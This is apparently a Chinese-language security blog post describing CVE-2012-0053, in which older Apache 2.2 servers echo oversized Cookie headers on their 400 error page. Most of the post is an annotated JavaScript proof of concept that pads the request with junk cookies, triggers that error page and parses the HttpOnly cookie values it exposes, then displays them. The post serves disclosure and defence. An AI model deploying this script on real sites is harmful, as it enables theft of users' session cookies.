
APACHE HTTP SERVER HTTPONLY COOKIE信息泄露漏洞

September 17, 2012 • Security

CVE-2012-0053

描述:

Apache HTTP Server 2.2.x 至 2.2.21 在建立 Bad Request (即400)错误文档时没有适当过滤请求头信息。远程攻击者可能构造页面发送含有超长(超过4K)或者含有缺陷的请求头来获取HTTPOnly Cookie的值。
受影响的Apache版本: 2.2.0 – 2.2.21

现象:

    Bad Request
    Your browser sent a request that this server could not understand.
    Size of a request header field exceeds server limit.
    Cookie: z9=AAAAAAAAAAAAAAA.......

Exp:


//Source:http://gist.github.com/1955a1c28324d4724b7b/7fe51f2a66c1d4a40a736540b3ad3fde02b7fb08
// Most browsers limit cookies to 4k characters, so we need multiple
/**
 * Sets (or expires) ten padding cookies named xss0..xss9 on path "/".
 *
 * Each padding cookie carries an 819-character value, so together they
 * inflate the browser's Cookie request header well past the limit that
 * produces the "Size of a request header field exceeds server limit"
 * 400 page shown above; that error page is what the vulnerable Apache
 * releases reflect the whole header into. This is the PoC's only role
 * for these cookies -- they are noise, not data.
 *
 * Defender note: the fix is server-side (a release later than 2.2.21
 * per the affected range above); nothing on the client can stop a
 * vulnerable server from echoing the header.
 *
 * @param {boolean|undefined} good - truthy: expire the padding cookies;
 *   falsy/undefined (the first call passes nothing): create them.
 */
function setCookies (good) {
// Build the 819-character padding value
   var str = "";
   for (var i=0; i< 819; i++) {
   str += "x";
}
// Write the ten cookies. `var i` is function-scoped, so this loop
// reuses the same binding the padding loop declared above.
for (i = 0; i < 10; i++) {
// Expire: an already-past expiry date (now minus 1 ms) deletes the cookie
if (good) {
   var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";
}
// Create: padding value on path "/", no expiry (session cookie)
else {
 var cookie = "xss"+i+"="+str+";path=/";
 }
   document.cookie = cookie;
 }
}

/**
 * Issues one same-origin GET to "/" with the inflated Cookie header and,
 * if the server answers with the oversized-header 400 page, parses the
 * cookie names/values it reflects inside <pre>...</pre>.
 *
 * Why this matters: the browser attaches every cookie for the origin to
 * the request, including HttpOnly ones that script cannot otherwise read;
 * on a vulnerable Apache the 400 error page hands them back as text.
 *
 * Detection hint (inferred, verify against your logs): a burst of 400
 * responses for "/" whose requests carry unusually large Cookie headers
 * is the server-side footprint of this pattern.
 */
function makeRequest() {
// Plant the padding cookies before sending the request
   setCookies();

   // readystatechange handler. It refers to `xhr`, declared with `var`
   // further down -- hoisting makes the name resolvable, and the
   // assignment has happened by the time the handler first runs.
   function parseCookies () {
   var cookie_dict = {};
// Act only on a completed request that was rejected with 400
   if (xhr.readyState === 4 && xhr.status === 400) {
// Flatten line breaks, then capture the <pre> body of the error page
   var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
   if (content.length) {
// Drop the "Cookie: " header-name prefix from the captured group
   content = content[1].replace("Cookie: ", "");
// Strip the xssN padding cookies; what remains are the origin's real
// cookies, then split the header into name=value items
   var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
// Record each item as name -> value (split on the first "=" only)
   for (var i=0; i<cookies.length; i++) {
   var s_c = cookies[i].split('=',2);
   cookie_dict[s_c[0]] = s_c[1];
   }
 }
// Expire the padding cookies again so later requests are normal size
setCookies(true);
   alert(JSON.stringify(cookie_dict));
}
}
// Async GET to the site root; the browser adds the Cookie header itself
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = parseCookies;
xhr.open("GET", "/", true);
xhr.send(null);
}
// Runs as soon as the script loads; there is no user-triggered entry point.
makeRequest();